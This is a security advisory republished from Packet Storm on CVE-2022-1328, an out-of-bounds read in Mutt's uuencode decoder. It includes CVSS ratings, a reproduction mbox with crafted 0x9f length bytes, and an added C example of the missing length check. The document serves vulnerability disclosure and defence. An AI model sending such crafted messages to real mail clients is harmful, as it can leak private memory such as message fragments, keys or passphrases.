packetstorm
Tavis Ormandy, Google Security Research
PACKETSTORM:167717
History: Jul 11, 2022 - 12:00 a.m.

Mutt mutt_decode_uuencoded() Memory Disclosure

2022-07-11 00:00:00
Tavis Ormandy, Google Security Research
packetstormsecurity.com

CVSS3: 5.3 Medium

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: LOW
Integrity Impact: NONE
Availability Impact: NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVSS2: 5 Medium

Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: NONE
Availability Impact: NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

`mutt: mutt_decode_uuencoded() can read past the end of the input line  
  
In mutt_decode_uuencoded(), the line length is read from the untrusted uuencoded part without validation. This could result in including private memory in replies, for example fragments of other messages, passphrases or keys.  
  
Reproduce with the following mbox; note that the <9f> markers are literal 0x9f bytes. This should show some uninitialized garbage in the message.  
  
From taviso Thu Mar 31 16:53:55 2022  
From: taviso  
Subject: mutt_decode_uuencoded test  
Content-Disposition: inline  
Content-Transfer-Encoding: x-uuencode  
Content-Type: text/plain  
  
begin 644 test  
<9f>  
M2&5L;&\L"@I)9B!Y;W4@87)E(')E861I;F<@=&AI<R!M97-S86=E(&EN(&UU  
M='0L('1H92!N97AT(&QI;F4*<VAO=6QD(&-O;G1A:6X@9V%R8F%G92X*"@H*  
<9f>  
54&QE87-E(')E<&QY+`I4879I<RX*  
`  
end.  
  
  
  
This bug is subject to a 90-day disclosure deadline. If a fix for this  
issue is made available to users before the end of the 90-day deadline,  
this bug report will become public 30 days after the fix was made  
available. Otherwise, this bug report will become public at the deadline.  
The scheduled deadline is YYYY-MM-DD.  
  
  
Related CVE Numbers: CVE-2022-1328.  
  
  
  
Found by: [email protected]  
  
`
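
The missing check described in the report, as an added example (not Mutt's code and not its actual fix): a single-line uuencode decoder that refuses a line whose length character is outside the uuencode alphabet or declares more data than the line holds. The function names and the sample lines in `main` are constructed for illustration.

```c
#include <stdio.h>

/* Map one uuencode character to its 6-bit value; -1 if outside the alphabet. */
static int uu_val(unsigned char ch)
{
    if (ch == '`')
        return 0;                         /* '`' is the alternate encoding of 0 */
    return (ch < 0x20 || ch > 0x5f) ? -1 : ch - 0x20;
}

/* Decode one uuencoded line of line_len characters (no newline).
 * Returns the number of bytes written, or -1 if the line is malformed:
 * bad length character, bad data character, or fewer data characters
 * than the declared length requires. */
int uu_decode_line(const char *line, size_t line_len,
                   unsigned char *out, size_t out_cap)
{
    if (line_len == 0)
        return -1;
    int n = uu_val((unsigned char)line[0]);      /* declared byte count */
    if (n < 0 || (size_t)n > out_cap)
        return -1;
    size_t need = ((size_t)n + 2) / 3 * 4;       /* data characters required */
    if (line_len - 1 < need)
        return -1;                               /* length overruns the line */
    const unsigned char *p = (const unsigned char *)line + 1;
    int written = 0;
    for (size_t i = 0; i < need; i += 4) {
        int v[4];
        for (int k = 0; k < 4; k++)
            if ((v[k] = uu_val(p[i + k])) < 0)
                return -1;
        int b[3] = { v[0] << 2 | v[1] >> 4,
                     v[1] << 4 | v[2] >> 2,
                     v[2] << 6 | v[3] };
        for (int k = 0; k < 3 && written < n; k++)
            out[written++] = (unsigned char)b[k]; /* keep the low 8 bits */
    }
    return written;
}

int main(void)
{
    unsigned char buf[63];                       /* 63 is the largest length value */
    /* Constructed inputs: a lone 0x9f line, and the uuencoding of "Cat". */
    printf("%d %d\n", uu_decode_line("\x9f", 1, buf, sizeof buf),
           uu_decode_line("#0V%T", 5, buf, sizeof buf));
    return 0;
}
```
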
